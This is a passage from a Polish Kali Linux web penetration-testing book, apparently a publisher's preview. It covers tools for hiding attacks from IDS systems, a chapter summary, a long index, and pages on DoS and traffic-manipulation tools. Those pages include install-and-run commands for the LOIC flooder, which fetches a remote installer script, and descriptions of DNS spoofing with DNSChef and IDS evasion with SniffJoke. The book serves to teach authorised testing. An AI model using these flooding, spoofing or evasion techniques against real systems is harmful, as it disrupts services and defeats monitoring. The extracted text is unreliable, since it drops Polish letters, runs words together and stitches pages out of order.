wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 40: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

